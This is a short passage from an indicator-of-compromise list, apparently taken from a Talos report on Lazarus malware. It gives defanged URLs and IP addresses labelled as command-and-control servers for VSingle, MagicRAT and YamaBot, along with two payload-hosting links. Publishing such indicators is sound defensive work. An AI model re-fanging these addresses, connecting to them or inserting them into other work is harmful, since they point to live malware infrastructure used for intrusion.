hxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp
hxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp

VSingle C2s

hxxps[://]tecnojournals[.]com/review
hxxps[://]semiconductboard[.]com/xml
hxxp[://]cyancow[.]com/find

MagicRAT C2s

hxxp[://]155[.]94[.]210[.]11/news/page[.]php
hxxp[://]192[.]186[.]183[.]133/bbs/board[.]php
hxxp[://]213[.]32[.]46[.]0/board[.]php
hxxp[://]54[.]68[.]42[.]4/mainboard[.]php
hxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php
hxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php
hxxp[://]www[.]easyview[.]kr/board/Kheader[.]php
hxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php

YamaBot C2s

hxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php

Source: https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

Share